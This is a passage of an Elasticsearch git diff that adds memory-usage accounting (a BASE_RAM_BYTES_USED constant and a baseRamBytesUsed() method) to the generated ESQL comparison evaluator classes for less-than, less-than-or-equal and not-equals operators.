LessThanDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java index cd0997a513c85..f447355bc294a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java index e88a9ae30d00b..4be8ca10e2517 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java index 5377441b5e8b5..b8b3a3ef70f00 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java index dd63a3c364cd3..3ec8c00b87e88 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java index 317a861b16ded..4f57a992520de 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java index bcfe416941b33..03d9962f2a591 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanOrEqualDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java index 83a8b4abc1c4d..167bd7ad6b58d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanOrEqualIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java index 13e6b336286aa..fc4371480857f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanOrEqualKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java index 0e01abc93ce82..934c2858820c9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanOrEqualLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java index 38d84fbd7a6d4..80fff2352a86a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanOrEqualMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java index ee46cb74e10ca..7dce2278eca22 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LessThanOrEqualNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java index 1d96506ea34cf..d7e1c44bfb02d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsBoolsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsBoolsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock lhsBlock, BooleanBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java index 11e3c7d1021ac..813b27a335c3b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java index d871a0cad6879..97af9037e3bb7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsGeometriesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsGeometriesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java index 15103562050cb..90cc439b8a313 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java index 5eb75c0bcf604..f93e3ad957578 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java index 0ba697142944f..37f669fcb0e21 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long 